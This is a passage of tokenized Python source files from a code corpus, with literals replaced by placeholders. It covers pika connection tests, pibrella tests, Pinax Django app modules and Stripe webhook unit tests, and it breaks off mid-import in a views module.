Basic . GetOk ) <EOL> self . assertEqual ( body , as_bytes ( self . msg_body ) ) <EOL> self . channel . basic_ack ( method . delivery_tag ) <EOL> self . stop ( ) <EOL> class TestZ_AccessDenied ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . parameters . virtual_host = str ( uuid . uuid4 ( ) ) <EOL> self . error_captured = False <EOL> super ( TestZ_AccessDenied , self ) . start ( * args , ** kwargs ) <EOL> self . assertTrue ( self . error_captured ) <EOL> def on_open_error ( self , connection , error ) : <EOL> self . error_captured = True <EOL> self . stop ( ) <EOL> def on_open ( self , connection ) : <EOL> super ( TestZ_AccessDenied , self ) . on_open ( connection ) <EOL> self . 
stop ( ) <EOL> class TestBlockedConnectionTimesOut ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . parameters . blocked_connection_timeout = <NUM_LIT> <EOL> self . on_closed_pair = None <EOL> super ( TestBlockedConnectionTimesOut , self ) . start ( * args , ** kwargs ) <EOL> self . assertEqual ( <EOL> self . on_closed_pair , <EOL> ( pika . connection . InternalCloseReasons . BLOCKED_CONNECTION_TIMEOUT , <EOL> '<STR_LIT>' ) ) <EOL> def begin ( self , channel ) : <EOL> channel . connection . _on_connection_blocked ( pika . frame . Method ( <EOL> <NUM_LIT:0> , <EOL> pika . spec . Connection . Blocked ( '<STR_LIT>' ) ) ) <EOL> def on_closed ( self , connection , reply_code , reply_text ) : <EOL> """<STR_LIT>""" <EOL> self . on_closed_pair = ( reply_code , reply_text ) <EOL> super ( TestBlockedConnectionTimesOut , self ) . on_closed ( connection , <EOL> reply_code , <EOL> reply_text ) <EOL> class TestBlockedConnectionUnblocks ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . parameters . blocked_connection_timeout = <NUM_LIT> <EOL> self . on_closed_pair = None <EOL> super ( TestBlockedConnectionUnblocks , self ) . start ( * args , ** kwargs ) <EOL> self . assertEqual ( <EOL> self . on_closed_pair , <EOL> ( <NUM_LIT:200> , '<STR_LIT>' ) ) <EOL> def begin ( self , channel ) : <EOL> channel . connection . _on_connection_blocked ( pika . frame . Method ( <EOL> <NUM_LIT:0> , <EOL> pika . spec . Connection . Blocked ( <EOL> '<STR_LIT>' ) ) ) <EOL> channel . connection . _on_connection_unblocked ( pika . frame . Method ( <EOL> <NUM_LIT:0> , <EOL> pika . spec . Connection . Unblocked ( ) ) ) <EOL> channel . connection . add_timeout ( <NUM_LIT> , self . on_cleanup_timer ) <EOL> def on_cleanup_timer ( self ) : <EOL> self . 
stop ( ) <EOL> def on_closed ( self , connection , reply_code , reply_text ) : <EOL> """<STR_LIT>""" <EOL> self . on_closed_pair = ( reply_code , reply_text ) <EOL> super ( TestBlockedConnectionUnblocks , self ) . on_closed ( connection , <EOL> reply_code , <EOL> reply_text ) </s>
<s> from . errors import APIError <EOL> from . auth import Credentials <EOL> from . hub import Hub <EOL> import conf </s>
<s> '''<STR_LIT>''' <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> from . service import OAuth1Service , OAuth2Service , OflyService <EOL> from . session import OAuth1Session , OAuth2Session , OflySession <EOL> from . __about__ import ( __title__ , __version_info__ , __version__ , __author__ , <EOL> __license__ , __copyright__ ) <EOL> ( __title__ , __version_info__ , __version__ , __author__ , __license__ , <EOL> __copyright__ ) </s>
<s> import os , sys <EOL> sys . path . insert ( <NUM_LIT:1> , os . path . join ( sys . path [ <NUM_LIT:0> ] , '<STR_LIT:..>' ) ) <EOL> import pibrella <EOL> if sys . version [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> import unittest2 as unittest <EOL> else : <EOL> import unittest <EOL> class TestAASanity ( unittest . TestCase ) : <EOL> def test_outputexists ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( isinstance ( pibrella . output . e , pibrella . Output ) , True ) <EOL> self . assertEqual ( isinstance ( pibrella . output . f , pibrella . Output ) , True ) <EOL> self . assertEqual ( isinstance ( pibrella . output . g , pibrella . Output ) , True ) <EOL> self . assertEqual ( isinstance ( pibrella . output . h , pibrella . Output ) , True ) <EOL> def test_output_index ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( pibrella . output . e , pibrella . output [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( pibrella . output . f , pibrella . output [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( pibrella . output . g , pibrella . output [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( pibrella . output . h , pibrella . output [ <NUM_LIT:3> ] ) <EOL> class TestBBInput ( unittest . TestCase ) : <EOL> def test_outputwrite ( self ) : <EOL> """<STR_LIT>""" <EOL> pibrella . output . e . write ( <NUM_LIT:1> ) <EOL> self . assertEqual ( pibrella . output . e . read ( ) , <NUM_LIT:1> ) <EOL> pibrella . output . f . write ( <NUM_LIT:1> ) <EOL> self . assertEqual ( pibrella . output . f . read ( ) , <NUM_LIT:1> ) <EOL> pibrella . output . g . write ( <NUM_LIT:1> ) <EOL> self . assertEqual ( pibrella . output . g . read ( ) , <NUM_LIT:1> ) <EOL> pibrella . output . h . write ( <NUM_LIT:1> ) <EOL> self . assertEqual ( pibrella . output . h . read ( ) , <NUM_LIT:1> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from . settings import get_config <EOL> from . exceptions import InvalidSettingsError </s>
<s> from django . contrib import admin <EOL> from flag . models import FlaggedContent , FlagInstance <EOL> class InlineFlagInstance ( admin . TabularInline ) : <EOL> model = FlagInstance <EOL> extra = <NUM_LIT:0> <EOL> class FlaggedContentAdmin ( admin . ModelAdmin ) : <EOL> inlines = [ InlineFlagInstance ] <EOL> admin . site . register ( FlaggedContent , FlaggedContentAdmin ) </s>
<s> from __future__ import unicode_literals <EOL> from account . conf import settings <EOL> from account . models import Account <EOL> def account ( request ) : <EOL> ctx = { <EOL> "<STR_LIT>" : Account . for_request ( request ) , <EOL> "<STR_LIT>" : settings . ACCOUNT_OPEN_SIGNUP , <EOL> } <EOL> return ctx </s>
<s> from django . contrib import admin <EOL> from . models import ( <EOL> Cohort , <EOL> SignupCodeCohort , <EOL> Survey , <EOL> SurveyAnswer , <EOL> SurveyInstance , <EOL> SurveyQuestion , <EOL> SurveyQuestionChoice , <EOL> UserCohort , <EOL> WaitingListEntry <EOL> ) <EOL> class WaitingListEntryAdmin ( admin . ModelAdmin ) : <EOL> list_display = [ "<STR_LIT:email>" , "<STR_LIT>" ] <EOL> search_fields = [ "<STR_LIT:email>" ] <EOL> class SignupCodeCohortInline ( admin . TabularInline ) : <EOL> model = SignupCodeCohort <EOL> class UserCohortInline ( admin . TabularInline ) : <EOL> model = UserCohort <EOL> class SurveyInstanceAdmin ( admin . ModelAdmin ) : <EOL> model = SurveyInstance <EOL> list_display = [ "<STR_LIT>" , "<STR_LIT:email>" , "<STR_LIT>" ] <EOL> def survey ( self , obj ) : <EOL> return obj . survey . label <EOL> def email ( self , obj ) : <EOL> return obj . entry . email <EOL> def created ( self , obj ) : <EOL> return obj . entry . created <EOL> class SurveyAnswerAdmin ( admin . ModelAdmin ) : <EOL> model = SurveyAnswer <EOL> list_display = [ "<STR_LIT>" , "<STR_LIT:email>" , "<STR_LIT>" , "<STR_LIT:value>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def survey ( self , obj ) : <EOL> return obj . instance . survey . label <EOL> def email ( self , obj ) : <EOL> return obj . instance . entry . email <EOL> def question_label ( self , obj ) : <EOL> return obj . question . question <EOL> class SurveyQuestionChoiceInline ( admin . TabularInline ) : <EOL> model = SurveyQuestionChoice <EOL> class SurveyQuestionAdmin ( admin . ModelAdmin ) : <EOL> model = SurveyQuestion <EOL> list_display = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> inlines = [ SurveyQuestionChoiceInline ] <EOL> def survey ( self , obj ) : <EOL> return obj . survey . label <EOL> admin . site . register ( WaitingListEntry , WaitingListEntryAdmin ) <EOL> admin . site . 
register ( <EOL> Cohort , <EOL> inlines = [ <EOL> SignupCodeCohortInline , <EOL> UserCohortInline , <EOL> ] <EOL> ) <EOL> admin . site . register ( <EOL> Survey , <EOL> list_display = [ "<STR_LIT:label>" , "<STR_LIT>" ] <EOL> ) <EOL> admin . site . register ( SurveyAnswer , SurveyAnswerAdmin ) <EOL> admin . site . register ( SurveyInstance , SurveyInstanceAdmin ) <EOL> admin . site . register ( SurveyQuestion , SurveyQuestionAdmin ) </s>
<s> import django . dispatch <EOL> post_viewed = django . dispatch . Signal ( providing_args = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> post_published = django . dispatch . Signal ( providing_args = [ "<STR_LIT>" ] ) <EOL> post_redirected = django . dispatch . Signal ( providing_args = [ "<STR_LIT>" , "<STR_LIT>" ] ) </s>
<s> import codecs <EOL> from os import path <EOL> from setuptools import find_packages , setup <EOL> def read ( * parts ) : <EOL> filename = path . join ( path . dirname ( __file__ ) , * parts ) <EOL> with codecs . open ( filename , encoding = "<STR_LIT:utf-8>" ) as fp : <EOL> return fp . read ( ) <EOL> setup ( <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> name = "<STR_LIT>" , <EOL> long_description = read ( "<STR_LIT>" ) , <EOL> version = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> license = "<STR_LIT>" , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> packages = find_packages ( ) , <EOL> package_data = { <EOL> "<STR_LIT>" : [ ] <EOL> } , <EOL> test_suite = "<STR_LIT>" , <EOL> tests_require = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> zip_safe = False <EOL> ) </s>
<s> from django . conf import settings <EOL> from appconf import AppConf <EOL> from collections import defaultdict <EOL> class PinaxLikesAppConf ( AppConf ) : <EOL> LIKABLE_MODELS = defaultdict ( dict ) <EOL> def configure_likable_models ( self , value ) : <EOL> DEFAULT_LIKE_CONFIG = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> for model in value : <EOL> custom_data = value [ model ] . copy ( ) <EOL> default_data = DEFAULT_LIKE_CONFIG . copy ( ) <EOL> value [ model ] = default_data <EOL> value [ model ] . update ( custom_data ) <EOL> return value <EOL> class Meta : <EOL> prefix = "<STR_LIT>" </s>
<s> import random <EOL> def generate_code ( referral_class ) : <EOL> def _generate_code ( ) : <EOL> t = "<STR_LIT>" <EOL> return "<STR_LIT>" . join ( [ random . choice ( t ) for i in range ( <NUM_LIT> ) ] ) <EOL> code = _generate_code ( ) <EOL> while referral_class . objects . filter ( code = code ) . exists ( ) : <EOL> code = _generate_code ( ) <EOL> return code <EOL> def filter_responses ( user = None , referral = None ) : <EOL> from . models import ReferralResponse <EOL> responses = ReferralResponse . objects . all ( ) <EOL> if user : <EOL> responses = responses . filter ( referral__user = user ) <EOL> if referral : <EOL> responses = responses . filter ( referral = referral ) <EOL> return responses . order_by ( "<STR_LIT>" ) </s>
<s> import importlib <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> import stripe <EOL> from appconf import AppConf <EOL> def load_path_attr ( path ) : <EOL> i = path . rfind ( "<STR_LIT:.>" ) <EOL> module , attr = path [ : i ] , path [ i + <NUM_LIT:1> : ] <EOL> try : <EOL> mod = importlib . import_module ( module ) <EOL> except ImportError as e : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" . format ( module , e ) <EOL> ) <EOL> try : <EOL> attr = getattr ( mod , attr ) <EOL> except AttributeError : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" . format ( module , attr ) <EOL> ) <EOL> return attr <EOL> class PinaxStripeAppConf ( AppConf ) : <EOL> PUBLIC_KEY = None <EOL> SECRET_KEY = None <EOL> API_VERSION = "<STR_LIT>" <EOL> INVOICE_FROM_EMAIL = "<STR_LIT>" <EOL> DEFAULT_PLAN = None <EOL> HOOKSET = "<STR_LIT>" <EOL> SEND_EMAIL_RECEIPTS = True <EOL> SUBSCRIPTION_REQUIRED_EXCEPTION_URLS = [ ] <EOL> SUBSCRIPTION_REQUIRED_REDIRECT = None <EOL> class Meta : <EOL> prefix = "<STR_LIT>" <EOL> required = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def configure_api_version ( self , value ) : <EOL> stripe . api_version = value <EOL> return value <EOL> def configure_secret_key ( self , value ) : <EOL> stripe . api_key = value <EOL> return value <EOL> def configure_hookset ( self , value ) : <EOL> return load_path_attr ( value ) ( ) </s>
<s> import decimal <EOL> import json <EOL> import six <EOL> from django . core . urlresolvers import reverse <EOL> from django . dispatch import Signal <EOL> from django . test import TestCase <EOL> from django . test . client import Client <EOL> import stripe <EOL> from mock import patch <EOL> from . import TRANSFER_CREATED_TEST_DATA , TRANSFER_PENDING_TEST_DATA <EOL> from . . models import Event , Transfer , EventProcessingException , Customer <EOL> from . . webhooks import registry , AccountUpdatedWebhook , ChargeCapturedWebhook , CustomerUpdatedWebhook , CustomerSourceCreatedWebhook , CustomerSourceDeletedWebhook , CustomerSubscriptionCreatedWebhook , InvoiceCreatedWebhook <EOL> class WebhookRegistryTest ( TestCase ) : <EOL> def test_get_signal ( self ) : <EOL> signal = registry . get_signal ( "<STR_LIT>" ) <EOL> self . assertTrue ( isinstance ( signal , Signal ) ) <EOL> def test_get_signal_keyerror ( self ) : <EOL> self . assertIsNone ( registry . get_signal ( "<STR_LIT>" ) ) <EOL> class WebhookTests ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_webhook_with_transfer_event ( self , StripeEventMock ) : <EOL> data = { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:data>" : { <EOL> "<STR_LIT:object>" : { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:date>" : <NUM_LIT> , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT:object>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" 
: <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> } <EOL> } , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:object>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } <EOL> StripeEventMock . return_value . to_dict . return_value = data <EOL> msg = json . dumps ( data ) <EOL> resp = Client ( ) . post ( <EOL> reverse ( "<STR_LIT>" ) , <EOL> six . u ( msg ) , <EOL> content_type = "<STR_LIT:application/json>" <EOL> ) <EOL> self . assertEquals ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertTrue ( Event . objects . filter ( kind = "<STR_LIT>" ) . exists ( ) ) <EOL> def test_webhook_duplicate_event ( self ) : <EOL> data = { "<STR_LIT:id>" : <NUM_LIT> } <EOL> Event . objects . create ( stripe_id = <NUM_LIT> , livemode = True ) <EOL> msg = json . dumps ( data ) <EOL> resp = Client ( ) . post ( <EOL> reverse ( "<STR_LIT>" ) , <EOL> six . u ( msg ) , <EOL> content_type = "<STR_LIT:application/json>" <EOL> ) <EOL> self . assertEquals ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertTrue ( EventProcessingException . objects . filter ( message = "<STR_LIT>" ) . exists ( ) ) <EOL> def test_webhook_event_mismatch ( self ) : <EOL> event = Event ( kind = "<STR_LIT>" ) <EOL> WH = registry . get ( "<STR_LIT>" ) <EOL> with self . assertRaises ( Exception ) : <EOL> WH ( event ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_send_signal ( self , SignalSendMock ) : <EOL> event = Event ( kind = "<STR_LIT>" ) <EOL> WH = registry . get ( "<STR_LIT>" ) <EOL> WH ( event ) . send_signal ( ) <EOL> self . assertTrue ( SignalSendMock . called ) <EOL> def test_send_signal_not_sent ( self ) : <EOL> event = Event ( kind = "<STR_LIT>" ) <EOL> WH = registry . 
get ( "<STR_LIT>" ) <EOL> def signal_handler ( sender , * args , ** kwargs ) : <EOL> self . fail ( "<STR_LIT>" ) <EOL> registry . get_signal ( "<STR_LIT>" ) . connect ( signal_handler ) <EOL> webhook = WH ( event ) <EOL> webhook . name = "<STR_LIT>" <EOL> webhook . send_signal ( ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_exception_is_logged ( self , ProcessWebhookMock , ValidateMock , LinkMock ) : <EOL> event = Event . objects . create ( kind = "<STR_LIT>" , webhook_message = { } , valid = True , processed = False ) <EOL> ProcessWebhookMock . side_effect = stripe . StripeError ( "<STR_LIT>" , "<STR_LIT:error>" ) <EOL> AccountUpdatedWebhook ( event ) . process ( ) <EOL> self . assertTrue ( EventProcessingException . objects . filter ( event = event ) . exists ( ) ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_return_none ( self , ValidateMock , LinkMock ) : <EOL> event = Event . objects . create ( kind = "<STR_LIT>" , webhook_message = { } , valid = True , processed = False ) <EOL> self . assertIsNone ( AccountUpdatedWebhook ( event ) . process ( ) ) <EOL> class ChargeWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock , RetrieveMock ) : <EOL> event = Event . objects . create ( kind = ChargeCapturedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> event . validated_message = dict ( data = dict ( object = dict ( id = <NUM_LIT:1> ) ) ) <EOL> ChargeCapturedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class CustomerUpdatedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = CustomerUpdatedWebhook . 
name , webhook_message = { } , valid = True , processed = False ) <EOL> CustomerUpdatedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class CustomerSourceCreatedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = CustomerSourceCreatedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> event . validated_message = dict ( data = dict ( object = dict ( ) ) ) <EOL> CustomerSourceCreatedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class CustomerSourceDeletedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = CustomerSourceDeletedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> event . validated_message = dict ( data = dict ( object = dict ( id = <NUM_LIT:1> ) ) ) <EOL> CustomerSourceDeletedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class CustomerSubscriptionCreatedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock , RetrieveMock ) : <EOL> event = Event . objects . create ( kind = CustomerSubscriptionCreatedWebhook . name , customer = Customer . objects . create ( ) , webhook_message = { } , valid = True , processed = False ) <EOL> CustomerSubscriptionCreatedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook_no_customer ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = CustomerSubscriptionCreatedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> CustomerSubscriptionCreatedWebhook ( event ) . process_webhook ( ) <EOL> self . 
assertFalse ( SyncMock . called ) <EOL> class InvoiceCreatedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = InvoiceCreatedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> event . validated_message = dict ( data = dict ( object = dict ( id = <NUM_LIT:1> ) ) ) <EOL> InvoiceCreatedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class TestTransferWebhooks ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_transfer_created ( self , EventMock ) : <EOL> ev = EventMock ( ) <EOL> ev . to_dict . return_value = TRANSFER_CREATED_TEST_DATA <EOL> event = Event . objects . create ( <EOL> stripe_id = TRANSFER_CREATED_TEST_DATA [ "<STR_LIT:id>" ] , <EOL> kind = "<STR_LIT>" , <EOL> livemode = True , <EOL> webhook_message = TRANSFER_CREATED_TEST_DATA , <EOL> validated_message = TRANSFER_CREATED_TEST_DATA , <EOL> valid = True <EOL> ) <EOL> registry . get ( event . kind ) ( event ) . process ( ) <EOL> transfer = Transfer . objects . get ( stripe_id = "<STR_LIT>" ) <EOL> self . assertEquals ( transfer . amount , decimal . Decimal ( "<STR_LIT>" ) ) <EOL> self . assertEquals ( transfer . status , "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_transfer_pending_create ( self , EventMock ) : <EOL> ev = EventMock ( ) <EOL> ev . to_dict . return_value = TRANSFER_PENDING_TEST_DATA <EOL> event = Event . objects . create ( <EOL> stripe_id = TRANSFER_PENDING_TEST_DATA [ "<STR_LIT:id>" ] , <EOL> kind = "<STR_LIT>" , <EOL> livemode = True , <EOL> webhook_message = TRANSFER_PENDING_TEST_DATA , <EOL> validated_message = TRANSFER_PENDING_TEST_DATA , <EOL> valid = True <EOL> ) <EOL> registry . get ( event . kind ) ( event ) . process ( ) <EOL> transfer = Transfer . objects . get ( stripe_id = "<STR_LIT>" ) <EOL> self . assertEquals ( transfer . amount , decimal . 
Decimal ( "<STR_LIT>" ) ) <EOL> self . assertEquals ( transfer . status , "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_transfer_paid_updates_existing_record ( self , EventMock ) : <EOL> ev = EventMock ( ) <EOL> ev . to_dict . return_value = TRANSFER_CREATED_TEST_DATA <EOL> event = Event . objects . create ( <EOL> stripe_id = TRANSFER_CREATED_TEST_DATA [ "<STR_LIT:id>" ] , <EOL> kind = "<STR_LIT>" , <EOL> livemode = True , <EOL> webhook_message = TRANSFER_CREATED_TEST_DATA , <EOL> validated_message = TRANSFER_CREATED_TEST_DATA , <EOL> valid = True <EOL> ) <EOL> registry . get ( event . kind ) ( event ) . process ( ) <EOL> data = { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:data>" : { <EOL> "<STR_LIT:object>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:object>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:date>" : <NUM_LIT> , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:object>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> 
"<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:count>" : <NUM_LIT:1> , <EOL> "<STR_LIT:data>" : [ { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } ] , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } ] , <EOL> "<STR_LIT:object>" : "<STR_LIT:list>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:object>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } <EOL> paid_event = Event . objects . create ( <EOL> stripe_id = data [ "<STR_LIT:id>" ] , <EOL> kind = "<STR_LIT>" , <EOL> livemode = True , <EOL> webhook_message = data , <EOL> validated_message = data , <EOL> valid = True <EOL> ) <EOL> registry . get ( paid_event . kind ) ( paid_event ) . process ( ) <EOL> transfer = Transfer . objects . get ( stripe_id = "<STR_LIT>" ) <EOL> self . assertEquals ( transfer . status , "<STR_LIT>" ) </s>
<s> import json <EOL> from django . http import Http404 , HttpResponse , HttpResponseRedirect , HttpResponseForbidden , JsonResponse <EOL> from django . shortcuts import render , redirect , get_object_or_404 <EOL> from django . template import RequestContext <EOL> from django . template . loader import render_to_string <EOL> from django . utils . decorators import method_decorator <EOL> from django . views . decorators . http import require_POST <EOL> from django . views . generic . edit import CreateView <EOL> from django . views . generic import ListView , FormView , TemplateView <EOL> from django . contrib import messages <EOL> from django . contrib . auth import get_user_model <EOL> from account . decorators import login_required <EOL> from account . mixins import LoginRequiredMixin <EOL> from account . views import SignupView <EOL> from six import string_types <EOL> from . decorators import team_required , manager_required <EOL> from . forms import TeamInviteUserForm , TeamForm , 